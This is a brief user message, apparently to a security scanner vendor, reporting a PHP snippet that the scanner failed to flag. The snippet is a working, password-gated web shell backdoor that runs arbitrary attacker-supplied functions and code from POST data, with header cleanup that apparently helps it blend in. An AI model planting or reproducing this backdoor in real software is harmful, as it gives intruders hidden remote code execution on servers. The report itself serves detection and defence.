if(isset($_POST["php_func"]) && md5($_POST["php_md5"])==="89ae1ff851c7286126070e49ace5eefe"){@$_POST["php_func"](stripslashes($_POST["php_code"]));}; if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);} if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
The php file scanner did not flag this as bad code, although it feels like this is something the php file scanner should have been able to notice.
Just looking to share the bad crap I find with you to help improve the product - I love it!
Jason